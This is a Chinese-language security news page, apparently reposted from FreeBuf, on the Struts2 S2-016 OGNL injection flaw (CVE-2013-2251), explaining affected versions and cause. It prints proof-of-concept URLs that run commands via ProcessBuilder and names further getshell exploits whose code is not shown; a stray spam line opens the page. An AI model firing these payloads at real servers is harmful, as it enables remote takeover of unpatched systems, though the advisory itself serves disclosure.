自拍偷在线精品自拍偷,亚洲欧美中文日韩v在线观看不卡

Struts2最新遠程代碼執(zhí)行漏洞(S2-016)描述

安全 漏洞
Struts又爆遠程代碼執(zhí)行漏洞了!在這次的漏洞中,攻擊者可以通過操縱參數(shù)遠程執(zhí)行惡意代碼。Struts 2.3.15.1之前的版本,參數(shù)action的值redirect以及redirectAction沒有正確過濾,導(dǎo)致ognl代碼執(zhí)行。

Struts又爆遠程代碼執(zhí)行漏洞了!在這次的漏洞中,攻擊者可以通過操縱參數(shù)遠程執(zhí)行惡意代碼。Struts 2.3.15.1之前的版本,參數(shù)action的值redirect以及redirectAction沒有正確過濾,導(dǎo)致ognl代碼執(zhí)行。

描述

影響版本 Struts 2.0.0 - Struts 2.3.15

報告者 Takeshi Terada of Mitsui Bussan Secure Directions, Inc.

CVE編號 CVE-2013-2251

漏洞證明

參數(shù)會以O(shè)GNL表達式執(zhí)行

http://host/struts2-blank/example/X.action?action:%25{3*4}
http://host/struts2-showcase/employee/save.action?redirect:%25{3*4}

代碼執(zhí)行

http://host/struts2-blank/example/X.action?action:%25{(new+
java.lang.ProcessBuilder(new+java.lang.String[]
{'command','goes','here'})).start()}

http://host/struts2-showcase/employee/save.action?redirect:%25
{(new+java.lang.ProcessBuilder(new+java.lang.String[]
{'command','goes','here'})).start()}

http://host/struts2-showcase/employee/save.action?redirectAction:%25
{(new+java.lang.ProcessBuilder(new+java.lang.String[]
{'command','goes','here'})).start()}

漏洞原理

The Struts 2 DefaultActionMapper supports a method for short-circuit navigation state changes by prefixing parameters with “action:” or “redirect:”, followed by a desired navigational target expression. This mechanism was intended to help with attaching navigational information to buttons within forms.

In Struts 2 before 2.3.15.1 the information following “action:”, “redirect:” or “redirectAction:” is not properly sanitized. Since said information will be evaluated as OGNL expression against the value stack, this introduces the possibility to inject server side code.

以下僅供教學(xué)研究之用,嚴禁非法用途!

執(zhí)行任意命令EXP,感謝X提供:

Struts2再爆遠程代碼執(zhí)行漏洞(S2-016)

爆網(wǎng)站路徑EXP,感謝h4ck0r提供:

Struts2再爆遠程代碼執(zhí)行漏洞(S2-016)  

python執(zhí)行任意命令,感謝h4ck0r提供

Struts2再爆遠程代碼執(zhí)行漏洞(S2-016) 

GETSHELL EXP,感謝coffee提供:

Struts2再爆遠程代碼執(zhí)行漏洞(S2-016) 

然后用以下代碼寫shell:

Struts2再爆遠程代碼執(zhí)行漏洞(S2-016)

上前目錄生成1.jsp

責(zé)任編輯:藍雨淚 來源: FreebuF
相關(guān)推薦

2013-05-22 10:28:19

2016-04-29 10:58:13

2013-07-18 15:09:27

2017-03-08 22:23:02

2012-12-18 16:18:06

2023-12-14 16:20:09

2017-07-11 09:42:22

漏洞

2016-03-16 15:34:32

2013-07-19 09:36:04

struts2struts2漏洞

2013-07-22 10:45:56

2016-06-08 10:09:24

2009-07-29 09:54:34

struts2和str

2013-07-24 10:35:02

2016-03-22 12:37:45

Struts2Struts2漏洞漏洞檢測

2009-06-25 15:11:28

Struts2教程Struts2程序

2017-09-12 07:54:32

2013-07-18 15:57:42

2009-02-04 10:51:07

2017-07-14 13:51:19

2017-03-07 10:34:40

Struts2Struts2漏洞
點贊
收藏

51CTO技術(shù)棧公眾號